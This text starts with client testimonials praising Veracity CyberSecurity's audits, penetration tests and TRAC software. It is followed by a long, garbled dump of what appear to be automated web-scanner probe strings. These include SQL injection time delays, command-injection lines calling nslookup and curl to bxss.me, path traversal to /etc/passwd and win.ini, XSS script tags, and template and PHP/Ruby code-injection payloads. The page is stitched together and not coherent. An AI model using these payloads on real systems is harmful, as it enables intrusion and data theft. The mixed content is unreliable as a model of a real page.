"I was always playing catch-up with our Information Security Program. Spending the time between audits and exams to learn more about and correct the findings from the last review. Then I learned about Veracity and we now have a proactive playbook that has our organization prepared for the next audit/exam at all times. I am so grateful for the opportunity to work with them! On top of all that, they are wonderful people to work with."
"Veracity has performed a number of virtual services for our institution, vulnerability assessment, penetration test, IT audit, and continued with weekly consultant calls. Not once have I noticed a disruption in services, weekly consultant calls are still made, reports have been delivery timely and the Virtual IT Audit went incredibly smooth!"
"The Veracity Assessment, IT Audit, External Pen, VA, and Social Engineering assessment were fantastic. You’ve got a great team! Special shoutouts to our auditor and network security engineer…best audit I’ve ever had. They were both extremely beneficial in identifying gaps, shortcomings, and potential concerns, as well as putting work into explaining the why, how, and next steps. They also took the time to recognize the things we do well. I’m very impressed!"
"We have done remote IT Audits with Veracity CyberSecurity for the last few years. They were extremely thorough and we were happy with how they were conducted."
"Veracity auditors are easy to work with, patient, and provide information in a timely manner. They actually act more like a partner because even though they have to write up items, they take the time to ensure it is understood what needs correcting and why. There were no surprises in our report because findings had been discussed while the auditors were onsite. Veracity auditors do a great job preparing us for regulatory exams."
"Veracity is really good at what they do! Whether your business utilizes them for IT testing, auditing, or their incredible TRAC program, Veracity receives an A+ from our bank. They have the tools and work ethic to ensure your exams go smoothly. Veracity is simply as good as it gets!"
"Veracity is knowledgeable and easy to work with. They took the time to understand our processes and provide recommendations that make us a stronger organization. We are comfortable with their audit process and the TRAC software provides a great resource for our staff!"
"Veracity CyberSecurity has become an important part of our continuing education for all things Information and Cyber Security. Their webinars and certification classes are relative, current and best of all, not boring. They are also a trusted vendor for External/Internal Penetration and Vulnerability Testing. We have found their process to be easy to follow and their testing to be very thorough."
"We are very happy with our relationship with Veracity and the performance of the TRAC software. With their help, expanding our Risk Assessment, Vendor Management, and Information Security projects was easy yet thorough. Veracity is extremely helpful and always there with a quick, accurate answer. They are very responsive to requests for new or expanded features and modules. We look forward to working with Veracity and TRAC for years to come."
"NIIT examiner is here. He absolutely LOVES your stuff. He had not seen your network security and IT audit work before and has been praising you for the past two days!"
"Veracity Institute has provided a flexible and comprehensive certification course that offers the custom focus that I was looking for. Great care was taken in the design and execution of this course to ensure that proper emphasis and clarification were used in reviewing the laws and regulations that apply to banking security professionals. Bravo to Veracity for delivering high value."
"I have been in the IT industry for nearly 30 years, I am a novice when it comes to the creation and modifying of bank policies, procedures, ISP, and improving our cybersecurity program. Veracity has been a great organisation to partner with to help train us in those areas. The TRAC software has been a great resource to organize our IT risk assessments, business processes, and vendor management. The Certified Banking Security Manager class greatly enhanced my understanding of what the Veracity consultants were helping us with."
"We have found Veracity to be knowledgeable, very easy to work with and our association with them has been a benefit to our company. The people at Veracity have the ability to talk at a high technical level to our IT staff and have a down to earth approach for our end users. They have worked around our schedule and have provided us with information, recommendations and helped implement processes we use to improve our data security and overall company IT performance. We consider Veracity our business partner and one of our main resources for data security. We believe an organizations of any size would benefit from working with them."
"Working with the staff at Veracity is always a pleasure. They helped us write policies that we never had, did intrusion testing and a vulnerability assessment. We are more secure because of the work they do for us."
555
1dRs8FPiO
555
555
555
555
555
555
555
a5PeUk8h
555
555
response.write(9074027*9104763)
uA2tMrAm: WaeeDAXN
'+response.write(9074027*9104763)+'
555
"+response.write(9074027*9104763)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
../../../../../../../../../../../../../../windows/win.ini
555
file:///etc/passwd
555
555
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
555
555
555
555
555
555
../555
555
${9999797+10000106}
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n995489=v958645
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
echo oehfxx$()\ lsnsiw\nz^xyu||a #' &echo oehfxx$()\ lsnsiw\nz^xyu||a #|" &echo oehfxx$()\ lsnsiw\nz^xyu||a #
555
555
555
!(()&&!|*|*|
&echo ghwuye$()\ ntohjt\nz^xyu||a #' &echo ghwuye$()\ ntohjt\nz^xyu||a #|" &echo ghwuye$()\ ntohjt\nz^xyu||a #
555
555&echo aaeims$()\ ksxtbx\nz^xyu||a #' &echo aaeims$()\ ksxtbx\nz^xyu||a #|" &echo aaeims$()\ ksxtbx\nz^xyu||a #
^(#$!@#$)(()))******
555
555
|echo siumnx$()\ xtqklk\nz^xyu||a #' |echo siumnx$()\ xtqklk\nz^xyu||a #|" |echo siumnx$()\ xtqklk\nz^xyu||a #
555
555
555|echo fsehbh$()\ pinrkn\nz^xyu||a #' |echo fsehbh$()\ pinrkn\nz^xyu||a #|" |echo fsehbh$()\ pinrkn\nz^xyu||a #
555
555
555
555
555
(nslookup -q=cname hitatluxmffhj91836.bxss.me||curl hitatluxmffhj91836.bxss.me))
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
$(nslookup -q=cname hitokivrxlcnf18661.bxss.me||curl hitokivrxlcnf18661.bxss.me)
555
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
555
&nslookup -q=cname hitzzbfjbnupsa1a67.bxss.me&'\"`0&nslookup -q=cname hitzzbfjbnupsa1a67.bxss.me&`'
555
555
&(nslookup -q=cname hittyojrmryra15347.bxss.me||curl hittyojrmryra15347.bxss.me)&'\"`0&(nslookup -q=cname hittyojrmryra15347.bxss.me||curl hittyojrmryra15347.bxss.me)&`'
Http://bxss.me/t/fit.txt
555
555
'.gethostbyname(lc('hitbo'.'ujyfzpqc5dfd8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(81).chr(103).chr(90).'
http://bxss.me/t/fit.txt%3F.jpg
555
/etc/shells
".gethostbyname(lc("hitzf"."tmybayun59cd2.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(73).chr(120).chr(84)."
555
555
../../../../../../../../../../../../../../etc/shells
|(nslookup -q=cname hituxqlhfjtek40efc.bxss.me||curl hituxqlhfjtek40efc.bxss.me)
gethostbyname(lc('hitbz'.'iqvpzovl1dc2e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(70).chr(122).chr(85)
c:/windows/win.ini
`(nslookup -q=cname hitrtiefnvcsw5a389.bxss.me||curl hitrtiefnvcsw5a389.bxss.me)`
555
555
;(nslookup -q=cname hitaxoviwxvoadd0d8.bxss.me||curl hitaxoviwxvoadd0d8.bxss.me)|(nslookup -q=cname hitaxoviwxvoadd0d8.bxss.me||curl hitaxoviwxvoadd0d8.bxss.me)&(nslookup -q=cname hitaxoviwxvoadd0d8.bxss.me||curl hitaxoviwxvoadd0d8.bxss.me)
bxss.me
555
555
555
555
555
555
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hityrbjudtbuh65f8f.bxss.me||curl${IFS}hityrbjudtbuh65f8f.bxss.me)
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitpvluscysyac51f4.bxss.me||curl${IFS}hitpvluscysyac51f4.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpvluscysyac51f4.bxss.me||curl${IFS}hitpvluscysyac51f4.bxss.me)&`'
555
HttP://bxss.me/t/xss.html?%00
555
bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555
555
555
555
555
555
555'&&sleep(27*1000)*rzswtx&&'
555
555
555
555
555
555
555"&&sleep(27*1000)*tnhqhs&&"
555
555
555'||sleep(27*1000)*qmydbv||'
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
"+"A".concat(70-3).concat(22*4).concat(103).concat(73).concat(114).concat(85)+(require"socket" Socket.gethostbyname("hitwv"+"juarlbdd5af89.bxss.me.")[3].to_s)+"
555"||sleep(27*1000)*tnlcbv||"
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
'+'A'.concat(70-3).concat(22*4).concat(112).concat(83).concat(119).concat(70)+(require'socket' Socket.gethostbyname('hitet'+'qfeqeqjq65137.bxss.me.')[3].to_s)+'
';print(md5(31337));$a='
555
";print(md5(31337));$a="
555
'A'.concat(70-3).concat(22*4).concat(118).concat(66).concat(107).concat(68)+(require'socket' Socket.gethostbyname('hitqw'+'xhzhuqqb56256.bxss.me.')[3].to_s)
555
555
555
555
${@print(md5(31337))}
555
xfs.bxss.me
${@print(md5(31337))}\
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
'"
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >8u9l(9217)</ScRiPt>
555
555
555
555
555
555
555
555
555
'"()&%<zzz><ScRiPt >8u9l(9241)</ScRiPt>
555
555
555
555
555
555
555
555
5559337543
555
555
555
555
555
555
response.write(9402781*9126597)
555
555
555
'+response.write(9402781*9126597)+'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
"+response.write(9402781*9126597)+"
555
555
555
555
555
555
555
555
x7mhYVgt
555
555
555
1YZZZoqJ: 45AfzLTj
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
file:///etc/passwd
555
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
555
555
555
555
${9999440+9999073}
../555
echo opgaor$()\ inrsdj\nz^xyu||a #' &echo opgaor$()\ inrsdj\nz^xyu||a #|" &echo opgaor$()\ inrsdj\nz^xyu||a #
&echo xbykel$()\ mimkof\nz^xyu||a #' &echo xbykel$()\ mimkof\nz^xyu||a #|" &echo xbykel$()\ mimkof\nz^xyu||a #
555
555&echo whmgom$()\ pjgmiz\nz^xyu||a #' &echo whmgom$()\ pjgmiz\nz^xyu||a #|" &echo whmgom$()\ pjgmiz\nz^xyu||a #
|echo ajtvgc$()\ hzvomd\nz^xyu||a #' |echo ajtvgc$()\ hzvomd\nz^xyu||a #|" |echo ajtvgc$()\ hzvomd\nz^xyu||a #
555|echo xskmmc$()\ efmqlu\nz^xyu||a #' |echo xskmmc$()\ efmqlu\nz^xyu||a #|" |echo xskmmc$()\ efmqlu\nz^xyu||a #
555
555
(nslookup -q=cname hitxrjafuijpsec319.bxss.me||curl hitxrjafuijpsec319.bxss.me))
555
$(nslookup -q=cname hityydzirxwlxadfb3.bxss.me||curl hityydzirxwlxadfb3.bxss.me)
555
555
&nslookup -q=cname hitgfmdgyjxphf23d8.bxss.me&'\"`0&nslookup -q=cname hitgfmdgyjxphf23d8.bxss.me&`'
555
555
555
555
&(nslookup -q=cname hitmgxtikiibse8151.bxss.me||curl hitmgxtikiibse8151.bxss.me)&'\"`0&(nslookup -q=cname hitmgxtikiibse8151.bxss.me||curl hitmgxtikiibse8151.bxss.me)&`'
555
555
555&n928509=v981542
|(nslookup -q=cname hitdjulfbyxkie28ed.bxss.me||curl hitdjulfbyxkie28ed.bxss.me)
555
`(nslookup -q=cname hitwhqgdhtybnd9cd7.bxss.me||curl hitwhqgdhtybnd9cd7.bxss.me)`
555
555
;(nslookup -q=cname hitsezhhdefnp8aade.bxss.me||curl hitsezhhdefnp8aade.bxss.me)|(nslookup -q=cname hitsezhhdefnp8aade.bxss.me||curl hitsezhhdefnp8aade.bxss.me)&(nslookup -q=cname hitsezhhdefnp8aade.bxss.me||curl hitsezhhdefnp8aade.bxss.me)
)
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitrxytvasbrj5f18c.bxss.me||curl${IFS}hitrxytvasbrj5f18c.bxss.me)
!(()&&!|*|*|
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitaoufgvdflu61244.bxss.me||curl${IFS}hitaoufgvdflu61244.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitaoufgvdflu61244.bxss.me||curl${IFS}hitaoufgvdflu61244.bxss.me)&`'
^(#$!@#$)(()))******
555
555
555
555
555
555
555
'.gethostbyname(lc('hitge'.'hgnlgavo2f358.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(71).chr(112).chr(74).'
555
555
555
555
555
".gethostbyname(lc("hitcc"."mpkytjpf5ba66.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(68).chr(100).chr(65)."
555
555
555
gethostbyname(lc('hitsf'.'zrblrhred5eb6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(74).chr(115).chr(85)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
HttP://bxss.me/t/xss.html?%00
555
555
555
bxss.me/t/xss.html?%00
Http://bxss.me/t/fit.txt
555
http://bxss.me/t/fit.txt%3F.jpg
555
555
/etc/shells
555
'"()
../../../../../../../../../../../../../../etc/shells
555
555'&&sleep(27*1000)*gdrknq&&'
555
555
555"&&sleep(27*1000)*vizxxi&&"
555
c:/windows/win.ini
555
555
555'||sleep(27*1000)*prufel||'
555
"+"A".concat(70-3).concat(22*4).concat(105).concat(67).concat(97).concat(70)+(require"socket" Socket.gethostbyname("hittn"+"xbgyawsd944fc.bxss.me.")[3].to_s)+"
555
bxss.me
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
'+'A'.concat(70-3).concat(22*4).concat(119).concat(69).concat(109).concat(83)+(require'socket' Socket.gethostbyname('hitph'+'dkmpzsii17612.bxss.me.')[3].to_s)+'
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555"||sleep(27*1000)*huzibc||"
xfs.bxss.me
'A'.concat(70-3).concat(22*4).concat(122).concat(87).concat(115).concat(80)+(require'socket' Socket.gethostbyname('hitam'+'jbsevroxd3d67.bxss.me.')[3].to_s)
';print(md5(31337));$a='
555
555
555
";print(md5(31337));$a="
555
555
555
555
555
${@print(md5(31337))}
555
'"
555
${@print(md5(31337))}\
555
555
555
<!--
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9085482*9791024)
555
KrIDGgoo
555
555
555
555
555
'+response.write(9085482*9791024)+'
VlZWVywP: YyHZQAOl
555
555
555
"+response.write(9085482*9791024)+"
555
555'"()&%<zzz><ScRiPt >kHFo(9932)</ScRiPt>
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()&%<zzz><ScRiPt >kHFo(9986)</ScRiPt>
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
5559588074
555
555
555
555
file:///etc/passwd
555
555
${10000110+9999659}
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
../555
555
555
555
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n969245=v935767
555
555
555
555
555
555
555
555
555
)
555
555
555
555
555
555
555
!(()&&!|*|*|
555
555
555
555
555
555
'.gethostbyname(lc('hitap'.'lomxwwye7f56e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(82).chr(118).chr(72).'
555
555
555
555
555
^(#$!@#$)(()))******
555
555
".gethostbyname(lc("hitfh"."dfmxbbpq782c6.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(78).chr(106).chr(70)."
555
555
555
555
555
555
555
gethostbyname(lc('hitql'.'oxbplggi0d3b1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(66).chr(104).chr(65)
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
555
echo bmdwgy$()\ yvhdpr\nz^xyu||a #' &echo bmdwgy$()\ yvhdpr\nz^xyu||a #|" &echo bmdwgy$()\ yvhdpr\nz^xyu||a #
555
555
555
bxss.me/t/xss.html?%00
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
&echo amyeof$()\ sijwqj\nz^xyu||a #' &echo amyeof$()\ sijwqj\nz^xyu||a #|" &echo amyeof$()\ sijwqj\nz^xyu||a #
555
555
555
555
555
555&echo tgrpwi$()\ iqqpqz\nz^xyu||a #' &echo tgrpwi$()\ iqqpqz\nz^xyu||a #|" &echo tgrpwi$()\ iqqpqz\nz^xyu||a #
555
';print(md5(31337));$a='
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
|echo igulzw$()\ tkuhhp\nz^xyu||a #' |echo igulzw$()\ tkuhhp\nz^xyu||a #|" |echo igulzw$()\ tkuhhp\nz^xyu||a #
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
555|echo ckuvrp$()\ acwiww\nz^xyu||a #' |echo ckuvrp$()\ acwiww\nz^xyu||a #|" |echo ckuvrp$()\ acwiww\nz^xyu||a #
555
555
Http://bxss.me/t/fit.txt
555
"+"A".concat(70-3).concat(22*4).concat(100).concat(73).concat(103).concat(73)+(require"socket" Socket.gethostbyname("hitrs"+"fijjiyfsf72e4.bxss.me.")[3].to_s)+"
555
";print(md5(31337));$a="
555
(nslookup -q=cname hitscmhvmwrbcf6387.bxss.me||curl hitscmhvmwrbcf6387.bxss.me))
555
555
555
555
555
${@print(md5(31337))}
http://bxss.me/t/fit.txt%3F.jpg
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
$(nslookup -q=cname hitagqqxluvkid1ecd.bxss.me||curl hitagqqxluvkid1ecd.bxss.me)
555
555
555
${@print(md5(31337))}\
555
/etc/shells
'+'A'.concat(70-3).concat(22*4).concat(110).concat(81).concat(106).concat(80)+(require'socket' Socket.gethostbyname('hitqj'+'ccyrncuzb344f.bxss.me.')[3].to_s)+'
&nslookup -q=cname hitgkmygzwthgbc340.bxss.me&'\"`0&nslookup -q=cname hitgkmygzwthgbc340.bxss.me&`'
555
555
&(nslookup -q=cname hityyyahdlqiy97d79.bxss.me||curl hityyyahdlqiy97d79.bxss.me)&'\"`0&(nslookup -q=cname hityyyahdlqiy97d79.bxss.me||curl hityyyahdlqiy97d79.bxss.me)&`'
'.print(md5(31337)).'
555
555
555
'A'.concat(70-3).concat(22*4).concat(98).concat(66).concat(113).concat(86)+(require'socket' Socket.gethostbyname('hitpw'+'ciilpcgg64ad0.bxss.me.')[3].to_s)
../../../../../../../../../../../../../../etc/shells
555
|(nslookup -q=cname hityvsfwpotpze75a5.bxss.me||curl hityvsfwpotpze75a5.bxss.me)
555
555
555
555
c:/windows/win.ini
`(nslookup -q=cname hiterinrntvqgcc1d6.bxss.me||curl hiterinrntvqgcc1d6.bxss.me)`
555
'"
bxss.me
555
;(nslookup -q=cname hitpiluiegovc08992.bxss.me||curl hitpiluiegovc08992.bxss.me)|(nslookup -q=cname hitpiluiegovc08992.bxss.me||curl hitpiluiegovc08992.bxss.me)&(nslookup -q=cname hitpiluiegovc08992.bxss.me||curl hitpiluiegovc08992.bxss.me)
555
<!--
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitqkzdjibcyz95035.bxss.me||curl${IFS}hitqkzdjibcyz95035.bxss.me)
555
xfs.bxss.me
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitjrytyohcot79ad9.bxss.me||curl${IFS}hitjrytyohcot79ad9.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitjrytyohcot79ad9.bxss.me||curl${IFS}hitjrytyohcot79ad9.bxss.me)&`'
555
555
555
555
555
555
555
555
'"()
555
555
555
555
555'&&sleep(27*1000)*krtfgv&&'
555
555
555"&&sleep(27*1000)*psbozb&&"
555
555
555
555'||sleep(27*1000)*waidhj||'
555
555'"()&%<zzz><ScRiPt >e2No(9104)</ScRiPt>
555
555
555"||sleep(27*1000)*qlckmf||"
555
555
555
555
555
555
'"()&%<zzz><ScRiPt >e2No(9686)</ScRiPt>
555
555
555
555
555
555
555
555
5559844461
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555Cfmje90i
555
555
555
-1 OR 2+28-28-1=0+0+0+1 --
555
-1 OR 2+223-223-1=0+0+0+1
-1' OR 2+772-772-1=0+0+0+1 --
555
-1' OR 2+900-900-1=0+0+0+1 or 'aKpT0HAX'='
-1" OR 2+863-863-1=0+0+0+1 --
555
555*if(now()=sysdate(),sleep(15),0)
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
1
555
555
1
1
1
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
1
1
555
1
555
555-1; waitfor delay '0:0:15' --
555
1
1
1
555
1
1
555-1); waitfor delay '0:0:15' --
1
1
1
1
1
555efcuvtB5
1
1
555
1
1
1
555-1 waitfor delay '0:0:15' --
1
1
1
1
1
555
1
1
1
-1 OR 2+351-351-1=0+0+0+1 --
1
1
1
-1 OR 2+493-493-1=0+0+0+1
555
1
1
-1' OR 2+347-347-1=0+0+0+1 --
555-1 waitfor delay '0:0:12' --
1
1
1
-1' OR 2+415-415-1=0+0+0+1 or 'Ha5PusZ7'='
1
1
1
-1" OR 2+604-604-1=0+0+0+1 --
1
1
1
1
1
1
1
1
1
1
1
1
1
555
1
1
1
5557nD497OY'; waitfor delay '0:0:15' --
1
1
1
1
1
1
1
1
1
1
1
1
555*if(now()=sysdate(),sleep(15),0)
1
1
1
1
1
555
1
1
1
1
1
1
1
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
555-1) OR 869=(SELECT 869 FROM PG_SLEEP(15))--
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555-1)) OR 699=(SELECT 699 FROM PG_SLEEP(15))--
555
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555d88adkd8' OR 472=(SELECT 472 FROM PG_SLEEP(15))--
555
555-1; waitfor delay '0:0:15' --
555AmlV4fCD') OR 154=(SELECT 154 FROM PG_SLEEP(15))--
555Vmzt7xHM
555-1); waitfor delay '0:0:15' --
555hS2usca1')) OR 932=(SELECT 932 FROM PG_SLEEP(15))--
555
-1 OR 2+387-387-1=0+0+0+1 --
-1 OR 2+751-751-1=0+0+0+1
555-1 waitfor delay '0:0:15' --
-1' OR 2+409-409-1=0+0+0+1 --
-1' OR 2+76-76-1=0+0+0+1 or 'Z8aOXEKg'='
-1" OR 2+955-955-1=0+0+0+1 --
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555IZCzBnPJ'; waitfor delay '0:0:15' --
555*if(now()=sysdate(),sleep(15),0)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
@@cvpCh
555-1 OR 700=(SELECT 700 FROM PG_SLEEP(15))--
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555-1) OR 678=(SELECT 678 FROM PG_SLEEP(15))--
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555-1)) OR 188=(SELECT 188 FROM PG_SLEEP(15))--
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555obfBJMRH' OR 156=(SELECT 156 FROM PG_SLEEP(15))--
555-1; waitfor delay '0:0:15' --
555
55538wcZ8UW') OR 97=(SELECT 97 FROM PG_SLEEP(15))--
555-1); waitfor delay '0:0:15' --
555FdR9ElWr')) OR 527=(SELECT 527 FROM PG_SLEEP(15))--
555-1 waitfor delay '0:0:15' --
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555BDljt85e'; waitfor delay '0:0:15' --
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555-1 OR 65=(SELECT 65 FROM PG_SLEEP(15))--
@@jusz5
555-1) OR 124=(SELECT 124 FROM PG_SLEEP(15))--
555
555-1)) OR 821=(SELECT 821 FROM PG_SLEEP(15))--
555
555lMqiDYxA' OR 643=(SELECT 643 FROM PG_SLEEP(15))--
555
555YRK6PxFk') OR 496=(SELECT 496 FROM PG_SLEEP(15))--
555
555OEUTT3Dp')) OR 161=(SELECT 161 FROM PG_SLEEP(15))--
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
@@SE9Er
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
555
555
555
1
555
555
555
555
555
555
555
555
1
555
555
555
1
1
1
1
1
555
1
555
1
555
1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >VeJR(9428)</ScRiPt>
555
'"()&%<zzz><ScRiPt >VeJR(9058)</ScRiPt>
555
5559698446
555
bfg2052%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2052
555
bfgx10104%C0%BEz1%C0%BCz2a%90bcxhjl10104
555
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >VeJR(9636)</ScRiPt>
555
555<W95UYE>9A22V[!+!]</W95UYE>
555
555<script>VeJR(9678)</script>
555
555
555
555
555